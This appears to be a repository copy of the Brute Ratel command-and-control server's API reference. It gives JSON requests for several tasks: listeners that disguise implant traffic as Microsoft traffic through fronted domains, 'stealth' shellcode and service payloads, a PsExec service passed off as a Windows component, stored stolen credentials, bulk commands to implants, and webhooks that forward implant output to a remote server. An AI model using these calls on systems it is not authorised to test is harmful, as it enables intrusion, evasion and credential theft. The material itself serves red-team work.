Files
MISFIT/api-ratel-war-room_pdf.md
2026-05-19 19:13:06 -07:00

1027 lines
22 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# api-ratel-war-room
---
Brute Ratel Documentation
Last Updated: Monday 16 January 2023
Ratel Server
Ratel server responses have some parameters which are common across all responses. These are:
access, status and task. The access key specifies whether the current users access token is valid.
The status key specifies the execution success status of the request. If the request was not executed
either due to incorrect value or any other environmental reasons, the return value will be false, else
true. The task key specifies the response is from which requested task. This can be helpful when
querying multiple requests for parsing the appropriate response. Some requests will have the
response under task id 24. This just means the response is a broadcast message which will be
delivered to all connected users.
Login (HTTP) No Task ID
Description HTTP Post request is required to get a token. This token should be used in a
Websocket request for handler interaction. Task ID is not required.
Parameters user Username
pass Password
Request {
"creds": {
"pass": "admin",
"user": "admin"
}
}
Response {
"access": true,
"is_admin": true,
"status": true,
"token": "5T7D3F8UCVOIAN2UE6AVCNLV8BHSFCT1"
}
Task 0: Authorization (Websocket)
Description Validates authorization of cookie over a websocket session. Returns detailed
server information.
Parameters task: 0
user: Username
token: Token received from login
Request {
"creds": {
"token": "5T7D3F8UCVOIAN2UE6AVCNLV8BHSFCT1",
"user": "admin"
},
"task": 0
}
Response Large blob of server metadata containing server version, user details,
commands available. The output is non-essential for automation purpose.
Task 1: Logout (Websocket)
Description Logs out existing user and disables user cookie
Parameters task 1
Request {
"task": 1
}
Response {
"access": false,
"status": true,
"task": 1,
}
Task 2: Create User (Websocket)
Description Creates a new non-admin user
Parameters task 2
user Username of new user
pass Password of new user
Request {
"create": {
"pass": "ratel",
"user": "ratel"
},
"task": 2
}
Response {
"access": true,
"status": true,
"task": 24,
"users": {
"active": {
"admin": "02-06-2022 17:36:18"
},
"inactive": {
}
}
}
Task 3: Delete User (Websocket)
Description Deletes an existing user with all of users cookies and .permissions
Parameters task 3
delete Username to delete
Request {
"delete": "ratel",
"task": 3
}
Response {
"access": true,
"status": true,
"task": 24,
"users": {
"active": {
"admin": "07-05-2020 08:44:33"
},
"inactive": {
}
}
}
Task 4: Reset User Password (Websocket)
Description Resets a users password
Parameters task 4
user Username to reset
pass New password for user
Request {
"k_user": {
"pass": "newpass",
"user": "ratel"
},
"task": 4
}
Response {
"access": true,
"status": true,
"task": 24,
"users": {
"active": {
"admin": "07-05-2020 08:44:33"
},
"inactive": {
"ratel": "07-05-2020 09:07:33"
}
}
}
Task 5: List User (Websocket)
Description Lists all users
Parameters task 5
Request {
"task": 5
}
Response {
"access": true,
"status": true,
"task": 5,
"users": {
"active": {
"admin": "07-05-2020 09:17:44"
},
"inactive": {}
}
}
Task 6: Create Listener (HTTP/DNS) (Websocket)
Description Creates different types of listener
Parameters task 6
append This field contains the value to append the badgers pos
request in a malleable profile
prepend This field contains the value to prepend the badgers
pos request in a malleable profile
auth_count This field indicates the number of passwords to be set
auth_type This field can be true or false. It indicates if auth is One
Time Auth or Regular
c2_authkeys This field can contain on or more set of listener keys.
Badger authenticates to this key. If is_random field is
true, this field is set automatically. If auth_count is more
than one and is_random is set, this field is set
automatically
c2_uri List of URIs that badger will connect back to
die_offline This field can be true or false. If the value is true, it
means the badger should die if it is unable to connect to
the C2, else vice versa.
extra_headers This field contains a key value pair of header names and
their values.
host Network interface IP which will be binded for listening
is_random If this field is true, c2_authkeys is set automatically
listener_name Name of the listener
os_type Type of payload: Current limited to windows
port Port to listen on
rotational_host This field can contain a list of IP/Domain/Redirector
domain/Fronted domain seperated by commas
useragent The useragent for the payload
ssl True or false
Request Random key for {
Regular auth "listener": {
"listener_name": "json-c2",
"append": "\"}",
"append_response": "\"}",
"auth_count": 1,
"auth_type": false,
"c2_authkeys": [
"abcd@123"
],
"c2_uri": [
"en/ec2/pricing/",
"?locale=en"
],
"die_offline": false,
"empty_response": "{\"Info\":\"Ok\"}",
"request_headers": {
"content-type": "application/json",
"referrer": "microsoft.com",
"Host": "microsoft.com"
},
"response_headers": {
"Server": "Apache/2.2.14 (Win32)",
"X-Backend-Server":
"developer2.webapp.scl3.mozilla.com",
"X-Cache-Info": "not cacheable; meta data too
large"
},
"host": "172.16.219.1",
"is_random": true,
"os_type": "windows",
"port": "443",
"prepend": "{\"channel\":\"",
"prepend_response": "{\"Output\":\"",
"rotational_host": "172.16.219.1",
"ssl": true,
"useragent": "Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/90.0.4430.93 Safari/537.36",
"sleep": 2,
"jitter": 0,
"obfsleep": "Pooling-0"
},
"task": 6
}
Custom key for {
One Time Auth "listener": {
"append": "\"}",
"auth_count": 0,
"auth_type": true,
"c2_authkeys": [
"abcd@123"
],
"c2_uri": [
"test",
"login",
"bootstrap"
],
"die_offline": true,
"extra_headers": {
"content-type": "application/json",
"referrer": "microsoft.com"
},
"host": "10.0.0.218",
"is_random": false,
"listener_name": "auto-869804a3",
"os_type": "windows",
"port": "443",
"prepend": "{\"sample_json\":\"",
"rotational_host":
"do.skype.com,msvcrl.microsoft.com",
"ssl": true,
"useragent": "Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/90.0.4430.93 Safari/537.36"
},
"task": 6
}
Multiple random {
keys for One Time "listener": {
Auth "append": "\"}",
"auth_count": 6,
"auth_type": true,
"c2_authkeys": [],
"c2_uri": [
"test",
"login",
"bootstrap"
],
"die_offline": true,
"extra_headers": {
"content-type": "application/json",
"referrer": "microsoft.com"
},
"host": "10.0.0.218",
"is_random": true,
"listener_name": "auto-869804a3",
"os_type": "windows",
"port": "443",
"prepend": "{\"sample_json\":\"",
"rotational_host":
"do.skype.com,msvcrl.microsoft.com",
"ssl": true,
"useragent": "Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/90.0.4430.93 Safari/537.36"
},
"task": 6
}
Response {
"access": true,
"listeners": {
"auto-869804a3": {
"append": "\"}",
"auth_count": 1,
"auth_type": false,
"c2_authkeys": [
"JKVM34MH5KB0LMQE"
],
"c2_uri": [
"test",
"login",
"bootstrap"
],
"die_offline": true,
"extra_headers": {
"content-type": "application/json",
"referrer": "microsoft.com"
},
"host": "10.0.0.218",
"is_random": true,
"os_type": "windows",
"port": "443",
"prepend": "{\"sample_json\":\"",
"rotational_host":
"do.skype.com,msvcrl.microsoft.com",
"ssl": true,
"useragent": "Mozilla/5.0 (Windows NT 10.0; Win64;
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93
Safari/537.36"
}
},
"status": true,
"task": 24
}
Task 7: Stop Listener (Websocket)
Description Stop a running listener with the listener name
Parameters task 7
listener Name of the listener to stop
Request {
"listener": "auto-869804a3",
"task": 7
}
Response {
"access": true,
"status": true,
"task": 7
}
Task 8: List Listener (Websocket)
Description Lists running listeners
Parameters task 8
Request {
"task": 8
}
Response {
"access": true,
"listeners": {
"auto-869804a3": {
"append": "\"}",
"auth_count": 1,
"auth_type": false,
"c2_authkeys": [
"JKVM34MH5KB0LMQE"
],
"c2_uri": [
"test",
"login",
"bootstrap"
],
"die_offline": true,
"extra_headers": {
"content-type": "application/json",
"referrer": "microsoft.com"
},
"host": "10.0.0.218",
"is_random": true,
"os_type": "windows",
"port": "443",
"prepend": "{\"sample_json\":\"",
"rotational_host":
"do.skype.com,msvcrl.microsoft.com",
"ssl": true,
"useragent": "Mozilla/5.0 (Windows NT 10.0; Win64;
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93
Safari/537.36"
}
},
"status": true,
"task": 8
}
Task 9: Host File On Listener (Websocket)
Description Host a new file on the server
Parameters task 9
buffer Base64 encoded content of file to host
listener_name Listener to modify
mime_type Custom mime-type for hosted file
uri URI to add (name of the file/uri which will be
accessed)
Request Host a file to server {
"listener_uri": {
"buffer": "SGVsbG8gd29ybGQK",
"listener_name": "auto-869804a3",
"mime_type": "text/plain",
"uri": "test.txt"
},
"task": 9
}
Response {
"access": true,
"listeners": {
"auto-869804a3": {
"append": "\"}",
"auth_count": 1,
"auth_type": false,
"c2_authkeys": [
"abcd@123"
],
"c2_uri": [
"en/ec2/pricing/",
"?locale=en"
],
"die_offline": false,
"extra_headers": {
"content-type": "application/json"
},
"host": "172.16.219.1",
"is_random": true,
"os_type": "windows",
"port": "443",
"prepend": "{\"channel\":\"",
"rotational_host": "172.16.219.1",
"ssl": true,
"useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93
Safari/537.36"
}
},
"status": true,
"task": 24
}
Task 10: Stop Hosted File On Listener (Websocket)
Description Host a file on a new URI
Parameters task 10
c2_uri Listener name and URI path to remove seperated by a
slash
Request {
"hosted": "auto-869804a3/test.txt"
"task": 10
}
Response {
"access": true,
"hosted": {
},
"status": true,
"task": 10
}
Task 11: List Hosted Files On Listener (Websocket)
Description Show hosted files
Parameters task 11
Request {
"task": 11
}
Response {
"access": true,
"hosted": {
"auto-869804a3/test.txt": "text/plain"
},
"status": true,
"task": 11
}
Task 13: PsExec Configuration (Websocket)
Description Show or manage PsExec configuration
Parameters task 13
type This field can contain psexec_config or update
depending on what task is being performed
svc_desc Name of the description for the service when building the
service for the psexec command
svc_name Name of the service to build when using the psexec
command
Request View psexec {
configuration "task": 13,
"type": "psexec_config"
}
Configure {
psexec "svc_desc": "test description for psexec badger service",
"svc_name": "Badger Service",
"task": 13,
"type": "update"
}
Response View Response {
"access": true,
"psexec_config": {
"svc_desc": "Manages universal application
core process that in Windows 8 and continues in Windows
10. It is used to determine whether universal apps installed
from the Windows Store are declaring all of their
permissions, like being able to access your telemetry,
location or microphone. It helps to transact records of your
universal apps with the trust and privacy settings of user.",
"svc_name": "TransactionBrokerService"
},
"status": true,
"task": 13,
"type": "psexec_config"
}
Modify PsExec {
"access": true,
"status": true,
"task": 13,
"type": "update"
}
Task 14: Manage Compromised Credentials (Websocket)
Description Add or remove credentials
Parameters task 14
crednote Credentials notes
credpass Password
credsrc Source of credentials
creduser Username
Request Add Credentials {
"add_creds": {
"crednote": "some notes",
"credpass": "P@ssw0rd",
"credsrc": "some text file",
"creduser": "brute"
},
"task": 14
}
Remove Credentials {
"del_creds": {
"crednote": "from host xyz",
"credpass": "pass123",
"credsrc": "mimikatz",
"creduser": "ninja"
},
"task": 14
}
Response Add Credentials {
"access": true,
"credentials": [
{
"crednote": "some notes",
"credpass": "P@ssw0rd",
"credsrc": "some text file",
"creduser": "brute"
}
],
"status": true,
"task": 24
}
Remove Credentials {
"access": true,
"credentials": [
],
"status": true,
"task": 24
}
Task 15: List Compromised Credentials (Websocket)
Description List all compromised credentials
Parameters task 15
Request {
"task": 15
}
Response {
"access": true,
"credentials": [
{
"crednote": "some notes",
"credpass": "P@ssw0rd",
"credsrc": "some text file",
"creduser": "brute"
}
],
"status": true,
"task": 15
}
Task 16: List All Badgers (Websocket)
Description List all connected badgers
Parameters task 16
Request {
"task": 16
}
Response {
"access": true,
"badgers": {
"b-0": {
"b_arch": "x64",
"b_bld": "18363",
"b_c2": "https://172.16.219.1:443",
"b_c2_id": "auto-869804a3",
"b_cookie":
"VUHMA3QT10CBCK815D6KQ0VMGBRBE3R0",
"b_h_name": "DESKTOP-G15FRLS",
"b_l_ip": "172.16.219.1",
"b_p_name": "Z:\\documents\\badger_x64.exe",
"b_pid": "9144",
"b_seen": "02-06-2022 19:31:28",
"b_uid": "vendetta",
"b_wver": "x64/10.0",
"dead": false,
"is_pvt": false,
"pipeline": "Direct",
"pvt_master": ""
}
},
"status": true,
"task": 16
}
Task 17: Send Badger Command (Websocket)
Description Send a command to badger
Parameters task 17
badger Badger id
cmd Command to send (All arguments are seperated by a space.
Local PE files (C#/powershell) are sent as base64 encoded
buffers
Request {
"bgr_cmd": {
"badger": "b-0",
"cmd": "pwd"
},
"task": 17
}
Response {
"access": true,
"status": true,
"task": 17
}
Task 18: Send Bulk Badger Query (Websocket)
Description Send command to all badgers connected to a specific listener
Parameters task 18
cmd Command which will be sent to all the badgers in a listener
listener Name of the listener to query in bulk
Request {
"blkconfig": {
"cmd": "pwd",
"listener": "json-c2"
},
"task": 18
}
Response {
"access": true,
"badger_count": "4",
"status": true,
"task": 18
}
Task 19: List Command Queue (Websocket)
Description List queued commands for badgers
Parameters task 19
Request {
"task": 19
}
Response {
"b-0": [
"pwd",
"pwd"
],
"b-1": [
"pwd"
],
"b-2": [
"pwd"
],
"b-3": [
"pwd"
]
}
Task 20: Clear Badger Queue (Websocket)
Description Clear all queued commands for a badger
Parameters task 20
badger Badger id
Request {
"bgr_rst": {
"badger": "b-0"
},
"task": 20
}
Response {
"access": true,
"status": true,
"task": 20
}
Task 21: Change Listener Password (Websocket)
Description Change Listener Password
Parameters task 21
listener Listener whose password is to be changed
pass New password. This can be a list of comma seperated values,
if multiple one time passwords need to be added.
Request {
"set": {
"listener": "primary-c2",
"pass": [
"abcd@123"
]
},
"task": 21
}
Response {
"access": true,
"status": true,
"task": 21
}
Task 22: List Server Configuration (Websocket)
Description List configuration for the whole server. This can be used to create a new C2
profile while starting the ratel server
Parameters task 22
Request {
"task": 22
}
Response A large blob of full server metadata
Task 30: Create/Modify Payload Profile (Websocket)
Description The default task is to create a payload profile. If a profile already exists under
the same name, then it is overwritten with the updated profile
Parameters task 30
payload_config Contains a key value pair of new payload profiles to add,
key being the name of the profile, and value containing
another json object
append This field contains the value to append the badgers pos
request in a malleable profile
c2_auth This field contain the authentication key required to
connect to the listener
c2_uri List of URIs that badger will connect back to
die_offline This field can be true or false. If the value is true, it
means the badger should die if it is unable to connect to
the C2, else vice versa.
extra_headers This field contains a key value pair of header names and
their values.
host This field can contain a list of IP/Domain/Redirector
domain/Fronted domain seperated by commas. For a
TCP payload, this can be a single IP or multiple IP
addresses.
port Port to listen on
prepend This field contains the value to prepend the badgers pos
request in a malleable profile
ssl True or false
type Type can be HTTP, SMB or TCP depending on the type
of profile being added
useragent The useragent for the payload
smb_pipe Name of the SMB pipe (only for SMB payloads)
show Should be false unless GUI is being used
Request Add/Modify HTTP {
profile "payload_config": {
"test-profile": {
"append": "\"}",
"append_response": "\"}",
"auth_count": 1,
"auth_type": false,
"c2_authkeys": [
"abcd@123"
],
"c2_uri": [
"en/ec2/pricing/",
"?locale=en"
],
"die_offline": false,
"empty_response": "{\"Info\":\"Ok\"}",
"request_headers": {
"content-type": "application/json",
"referrer": "microsoft.com",
"Host": "microsoft.com"
},
"response_headers": {
"Server": "Apache/2.2.14 (Win32)",
"X-Backend-Server":
"developer2.webapp.scl3.mozilla.com",
"X-Cache-Info": "not cacheable; meta data too
large"
},
"host": "172.16.219.1",
"is_random": true,
"os_type": "windows",
"port": "443",
"prepend": "{\"channel\":\"",
"prepend_response": "{\"Output\":\"",
"rotational_host": "172.16.219.1",
"ssl": true,
"useragent": "Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/90.0.4430.93 Safari/537.36",
"sleep": 2,
"jitter": 0,
"obfsleep": "Pooling-0"
}
},
"show": true,
"task": 30
}
Add/Modify SMB {
Profile "payload_config": {
"main_smb2": {
"c2_auth": "abcd@123",
"smb_pipe": "\\\\.\\pipe\\mynamedpipe",
"type": "SMB",
"obfsleep": "Pooling-0"
}
},
"show": true,
"task": 30
}
Add/Modify TCP {
Profile "payload_config": {
"main_tcp2": {
"c2_auth": "abcd@123",
"host": "127.0.0.1",
"port": "10000",
"type": "TCP",
"obfsleep": "Pooling-0"
}
},
"show": true,
"task": 30
}
Response Json response containing the profile which was successfully added
Task 31: View Payload Configuration (Websocket)
Description View all payload profiles
Parameters task 31
edit This field should be false if a profile is being view. If an
existing profile is being added, this will be true and the
same information sent in Task 30 can be sent over here.
Request {
"edit": false,
"task": 31
}
Response {
"access": true,
"edit": false,
"payload_config": {
"auto-869804a3": {
"append": "\"}",
"c2_auth": "abcd@123",
"c2_uri": [
"en/ec2/pricing/",
"?locale=en"
],
"die_offline": false,
"extra_headers": {
"content-type": "application/json"
},
"host": "172.16.219.1",
"port": "443",
"prepend": "{\"channel\":\"",
"ssl": true,
"type": "HTTP",
"useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93
Safari/537.36"
},
"main_smb": {
"c2_auth": "abcd@123",
"smb_pipe": "\\\\.\\pipe\\mynamedpipe",
"type": "SMB"
},
"main_tcp": {
"c2_auth": "abcd@123",
"host": "127.0.0.1",
"port": "10000",
"type": "TCP"
}
},
"status": true,
"task": 31
}
Task 32: Delete Payload Profile (Websocket)
Description Deletes an existing payload profile
Parameters task 32
payload_config Name of the payload profile
Request {
"payload_config": "test-profile",
"task": 32
}
Response Remaining json profiles or an empty json profile if no more profiles exist
Task 36: Generate Payload (Websocket)
Description Build a tcp/smb/http/dns payload
Parameters task 36
payload_arch This field contains 0 or 1. 0 means arch type x86,
whereas 1 means x64
payload_config_name The name of the config on the server from which the
payload needs to be generated
payload_type The payload types be the following:
0: ret shellcode
1: rtl shellcode
2: wait shellcode
4: dll
5: service exe
7: stealth ret
8. stealth rtl
9. stealth wait
10. stealth service exe
The response will be base64 encoded
save_path The local path where the payload needs to be saved
svc_desc The service description (optional and only valid for
service payload_type)
svc_name The service name (optional and only valid for service
payload_type)
Request {
"payload_arch": 1,
"payload_config_name": "auto-json-c2",
"payload_type": 0,
"save_path": "/home/paranoidninja/Documents/badger_x64_ret.bin",
"svc_desc": "NA",
"svc_name": "NA",
"task": 36
}
Response {
"access": true,
"payload_dat": "TVqQAAMAAAAEAAAA",
"ptype": 2,
"save_path": "/home/paranoidninja/Documents/badger_x64_ret.bin",
"status": true,
"task": 36
}
Task 40: Enable Staging on HTTP Listener (Websocket)
Description Enable HTTP Staging
Parameters task 40
build false
listener_name Json-c2 (name of the listener)
Request {
"task": 40,
"build": false,
"listener_name": "json-c2"
}
Response Returns staging listener name and payload configuration of the stage
enabled
Task 41: Disable Staging on HTTP Listener (Websocket)
Description Disable HTTP Staging
Parameters task 41
remove true
listener_name Json-c2 (name of the listener)
Request {
"task": 41,
"listener_name": "json-c2",
"remove": true
}
Response {
"access": true,
"listener_name": "json-c2",
"remove": true,
"status": true,
"task": 41
}
Task 45: Manage WebHooks (Websocket)
Description Start or stop a configured webhook. Webhooks can be used to forward
badger output (either just the initial access or fully detailed outputs to remote
servers, where automation can be performed by parsing found strings in the
output)
Parameters task 45
webhook Contains a key value pair of the settings for webhook to be
configured
badger_init If this is true, the initial connection of badger and badgers
metadata will be forwarded to the users server
badger_log If this is true, all of badgers output will be forwarded to the
users server
listener The name of the listener on which the webhook needs to
be enabled
start This field specified whether the webhook needs to be
started or stopped
webhook_host The host on which the logs/metadata of the badger needs
to be forwarded
Request Enable webhook {
"task": 45,
"webhook": {
"badger_init": true,
"badger_log": true,
"listener": "json-c2",
"start": true,
"webhook_host": "https://evasionlabs.com"
}
}
Disable webhook {
"task": 45,
"webhook": {
"listener": "json-c2",
"stop": true
}
}
Response Enable webhook {
"access": true,
"listener": "json-c2",
"status": true,
"task": 45
}
Disable webhook {
"access": true,
"status": true,
"task": 45
}
Task 46: Switch Badger Profile (Websocket)
Description Change badgers malleable profile. Make note the badger needs to exist for
this to work
Parameters task 46
profile Payload profile name
bgrlist An array of badgers whose profile
needs to be changed
Request {
"task": 46,
"profile": "auto-json-c2",
"bgrlist": [
"b-0", "b-1"
]
}
Response {
"access":true,
"status":true,
"task":46
}
Task 58: Add Note To Badger (Websocket)
Description Add note against a badger
Parameters task 58
badger The badger ID (b-0)
note The note to be added
Request {
"task": 58,
"badger": "b-0",
"note": "sample note for badger zero"
}
Response {
"access":true,
"status":true,
"task":58
}